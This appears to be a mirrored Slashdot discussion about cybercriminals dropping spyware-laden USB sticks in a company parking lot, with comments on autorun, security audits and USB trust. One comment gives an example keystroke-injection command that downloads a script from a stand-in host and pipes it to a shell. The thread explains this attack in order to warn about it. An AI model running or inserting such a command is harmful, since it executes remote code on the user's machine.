Slashdot Mirror
Criminals Distribute Infected USB Sticks In Parking Lot
New submitter sabri writes "The Dutch news-site Elsevier is reporting that cybercriminals attempted to steal data from a multinational chemicals company by 'losing' spyware-infected USB sticks on the company's parking lot. Their attempt failed as one of the employees who found the stick dropped it off at the company's IT department, who then found the spyware and issued a warning. So next time, don't expect to find someone's dirty pictures on a USB stick you just found..."
No, that's what operating systems that don't automatically run any executable that happens to appear are for.
Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?
These were targeted specifically though at the one company, greatly increasing the odds of getting into something that they were interested in.
---------- Open Source is capitalism applied to IP.
Seriously, how did this get past the fire-hose? This isn't a new idea, practice, or form of attack. It's actually many many years old (likely dating back to the days of floppy disks). Most company Security and/or IT policies state that you should bring found USB Drives to Security and/or IT, and expressly forbid just plugging them into a company computer on the company network. I have no idea how anyone at Slashdot would have found this remotely news-worthy.
dd if=/dev/zero of=/dev/[usbdrive]
voila, free thumb drive, malware free.
Not if the drive has firmware that detects if it's plugged into a Windows host. For non-windows, it acts as a normal flash drive, but if you plug it into Windows, then it exposes the virus. So you take it home, load it up with MP3's from your linux computer and everything is fine, but then when you give it to your wife and she see a filenamed "naked_secretary.exe", she runs it and gets infected.
This is a time-honored way of targeting a particular company. It sounds expensive, but if your motivation is commercial or governmental *coughcoughstux* it's extremely cheap compared to the alternatives (bribery, breaking-and-entering, rubber-hose cryptography). It's also a great way of finding out whether your own organization is aware of malware trouble; this technique is commonly used as part of security audits performed by companies hired to find out how good your company really is.
A company I worked for a few years ago hired a security auditing firm to check up on ourselves (only a few people were told, and we were told to keep quiet to ensure that our day-to-day practices were tested, not our "crap, someone's checking!" performance). They were unable to penetrate the network from the outside (including wirelessly) or socially engineer their way past reception or weasel out a password, but they got in via the USB-stick-in-the-parking-lot method. They told us afterwards that this is an extremely effective technique, as primate curiosity is almost unstoppable.
Everybody gets what the majority deserves.
The human body either digests or kills anything that's not marked as belonging to the body. It does allow stuff on it's surface and in the lining of the stomach I guess, but other than that, it seems to shoot first and asks questions later. Of course it can be tricked or overwhelmed, but it's not nearly as laid back as you seem to think. (Which can lead to horrible conditions where some body cells aren't recognized for some reason, and mercilessly attacked.)
The human body = mean ass motherfucker. Don't even fucking look at the guy, or he will travel back in time and drop your parents before they can meet.
Computers and operating systems, definately consumer ones = uhm... Ralph Wiggum? Yeah, that seems about right :P
As long as your computer does not autoexecute the USB drive, there is no problem. Of course, on many machines the USB does execute automatically, and it seems if the IT department lets that behavior stand, the responsibility cannot be with the user, but with the IT people.
"She's a scientist and a lesbian. She's not going to let it slide." Orphan Black
The trouble with USB is that you don't know. Let's say you plug in that "thumb drive". Perhaps it turns out to be a "keyboard" that issues whatever the shortcut is for executing a command and sends something like:
wget -q -O - http://naughty.com/ | sh
All sorts of things could happen when you plug in a USB stick. Perhaps not too much of a worry in practice for Joe Schmo as doing it effectively would probably require a level of sophistication that would make it not worth while for a vague target but Linux does not magically make USB sticks safe.
Boffoonery - downloadable Comedy Benefit for Bletchley Park
Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?
Not idiotic, just outdated. When Windows XP was released, way back in 2001, the assumption was that removable media was going to be a pressed CD or DVD and that these sources could be trusted. This assumption started to break down with the advent of cheap CD/DVD writers, and became completely absurd when inexpensive flash drives proliferated.
As a result, Microsoft removed Autorun from USB drives as part of a Windows XP update in 2011. (Probably a bit late, but still, they did fix it.) On Windows 7, Autorun for USB drives was never included. The user would have to run the malware manually (and if it wants admin permissions, you'd also have to click through the UAC warning).
A properly coded operating system would not execute an unknown application without firs asking the user. Furthermore, a correctly build operating system would not allowed applications executed by an unprivileged user to gain control of the operating system. As you see your comments lack validity. As far as the website you mentioned, that advice will only work with systems that have been badly configured with the intention of allowing an intruder to penetrate them. I suggest you get familiar with real operating systems and stop playing with what in the computer world qualifies as “toddler operating systems” that lack strength and maturity to operate in an unprotected environment.
I know that taking away the mouse and keyboard dramatically reduces the number of user mistakes, but I do wonder if this isn't taking it a little too far.
Assorted stuff I do sometimes: Lemuria.org